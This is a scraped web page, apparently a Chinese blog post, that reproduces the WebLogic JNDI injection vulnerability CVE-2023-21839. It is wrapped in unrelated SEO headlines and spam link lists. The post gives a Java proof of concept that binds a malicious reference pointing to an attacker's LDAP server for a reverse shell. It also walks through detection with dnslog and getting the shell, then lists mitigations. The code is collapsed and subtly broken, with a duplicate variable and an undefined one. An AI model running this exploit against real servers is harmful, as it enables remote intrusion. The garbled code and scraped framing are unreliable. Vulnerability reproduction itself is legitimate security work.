当前位置: 首页 > news >正文

网站建设视频百度云/seo排名查询

网站建设视频百度云,seo排名查询,海南企业建站,绍兴网站设计公司前言 刷B站的时候给我推的一个WebLogic的比较新的漏洞,可以通过此漏洞直接达到RCE进行getShell的效果,于是就简单复现和分析一下,做个记录。 视频链接 漏洞简单分析 此漏洞是属于WebLogic的JNDI注入漏洞,漏洞造成的原因是Weblo…

前言

刷B站的时候给我推的一个WebLogic的比较新的漏洞,可以通过此漏洞直接达到RCE进行getShell的效果,于是就简单复现和分析一下,做个记录。
视频链接

漏洞简单分析

此漏洞是属于WebLogic的JNDI注入漏洞,漏洞造成的原因是Weblogic的t3或iiop协议支持远程绑定对象到服务端,并且能通过lookup查找,如果远程对象继承OpaqueReference就会调用OpaqueReference.getReferent方法,而getReferent方法中存在context.lookup(remoteJNDIName)的实现,导致了可以使用rmi/ldap协议从远程服务器中调用文件并进行执行。

漏洞利用代码如下:

import javax.naming.Context;
import javax.naming.InitialContext;
import javax.naming.NamingException;
import java.lang.reflect.Field;
import java.util.Hashtable;public class CVE_2023_21839{public static void main(String args[]) throws Exception {String JNDI_FACTORY="weblogic.jndi.WLInitialContextFactory";Hashtable<String,String> env = new Hashtable<String,String>();env.put(Context.INITIAL_CONTEXT_FACTORY, JNDI_FACTORY);env.put(Context.PROVIDER_URL, url);InitialContext c=new InitialContext(env);Hashtable<String,String> env = new Hashtable<String,String>();env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.rmi.registry.RegistryContextFactory");weblogic.deployment.jms.ForeignOpaqueReference f=new weblogic.deployment.jms.ForeignOpaqueReference();Field jndiEnvironment=weblogic.deployment.jms.ForeignOpaqueReference.class.getDeclaredField("jndiEnvironment");jndiEnvironment.setAccessible(true);jndiEnvironment.set(f,env);Field remoteJNDIName=weblogic.deployment.jms.ForeignOpaqueReference.class.getDeclaredField("remoteJNDIName");remoteJNDIName.setAccessible(true);remoteJNDIName.set(f,"ldap://ip:1389/Basic/ReverseShell/ip/port");c.bind("test",f);c.lookup("test");}}

file

poc中通过InitialContext进行初始化了一个对象,使用反射访问和修改ForeignOpaqueReference的jndiEnvironment和emoteJNDIName进行赋值,将ForeignOpaqueReference远程绑定到JNDI服务,最后调用InitialContext对象的lookup方法执行查找,就可以利用rmi/ldap远程协议进行RCE。之所以绑定ForeignOpaqueReference到服务,因为这个类继承于QpaqueReference接口,当实现此接口的对象从 WLContext 中检索,将由getReferent() 返回对象,通过getReferent()中retVal = context.lookup(evalMacros(this.remoteJNDIName))的实现进行命令执行。

影响版本:
Weblogic 12.2.1.3.0
Weblogic 12.2.1.4.0
Weblogic 14.1.1.0.0

漏洞复现

  1. 拉取docker,docker pull vulhub/weblogic:12.2.1.3-2018

  2. 通过dnslog.cn测试漏洞是否存在

file

file

file

  1. 漏洞存在,伪造JNDI服务器,反弹shell

file

file

file

通过lookup接口取得反弹shell的payload,执行,反弹shell成功。

防护措施

  1. 及时安装漏洞修复补丁
  2. 通过连接筛选器阻止外部访问7001端口的T3协议
  3. 禁用IIOP协议
http://www.jmfq.cn/news/5044033.html

相关文章:

  • 怎么查看网站空间大小/百度首页官网
  • 手机网站制作行业排行/最近的国际新闻
  • 找产品代理去哪个网站/百度快速收录工具
  • 家装公司网站/软文营销写作技巧
  • b2c旅游网站建设/一周热点新闻
  • 全包网站/西安网红
  • 新闻聚合网站怎么做/产品推广计划书怎么写
  • 电子商务网站的建设费用/百度推广登陆入口
  • 免费学习做网站/google推广妙招
  • 网站建设优化教程/关键词网站查询
  • 网站设计与管理方向/百度知道在线
  • 青岛关键词网站排名/app关键词排名优化
  • 营销类网站建营销类网站建设/网络销售的工作内容
  • 网站支付接口如何做/百度推广的广告真实可信吗
  • 企业网站建设最新技术/中国seo网站
  • 衡阳网站排名优化/免费刷seo
  • 自己做网站的软件/seo如何优化一个网站
  • 网页打不开验证码图片/郑州seo外包
  • 58同城网站官网/百度网址ip
  • 调教亲妹妹做性奴网站/seo咨询顾问
  • 微网站的建设/小视频网站哪个可以推广
  • 政府网站模版/百度seo排名规则
  • 手机网站建设免费空间/360竞价推广怎么做
  • 贵阳经济技术开发区网站/杭州网站设计
  • 网站导航菜单代码/百度快照网址
  • 免费可以绑定域名网站空间/长沙网站搭建关键词排名
  • 服务/百度关键词如何优化
  • 广东上海专业网站建设公司排名/优化设计高中
  • c网站开发视频教程/网站关键词排名查询
  • 一个空间可以做两个网站吗/广州抖音seo